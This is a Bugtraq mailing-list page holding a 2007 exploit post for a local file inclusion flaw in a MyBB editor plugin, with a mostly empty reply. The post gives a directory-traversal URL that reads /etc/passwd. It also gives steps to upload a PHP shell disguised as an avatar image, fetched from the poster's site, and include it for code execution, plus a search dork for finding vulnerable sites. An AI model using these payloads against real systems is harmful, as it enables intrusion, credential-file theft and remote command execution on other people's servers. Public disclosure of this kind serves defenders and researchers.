Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
Mybb Hot Editor Plugin Local File Inclusion Apr 09 2007 01:40PM
liz0 expw0rm com (1 replies)
<?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0 (at) expw0rm (dot) com [email concealed]
---------------------------------------
Vul. Code : keyboard.php line 3

require_once "./vk_code/$first";
----------------------------------------

*/

http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../.
./../../../../../../../../../../etc/passwd

And

upload php shell = > http://www.expw0rm.com/avatar_36.zip

http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avata
rs/avatar_36.gif => target isn't show with ie.plese you use firefox

Dork: "MTR Paket :"
?>

// Exploit Worm www.expw0rm.com

orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114
.html

[ reply ]
Re: Mybb Hot Editor Plugin Local File Inclusion Apr 09 2007 05:08PM
Kevin Finisterre (lists) (kf_lists digitalmunition com)







 

Privacy Statement
Copyright 2009, SecurityFocus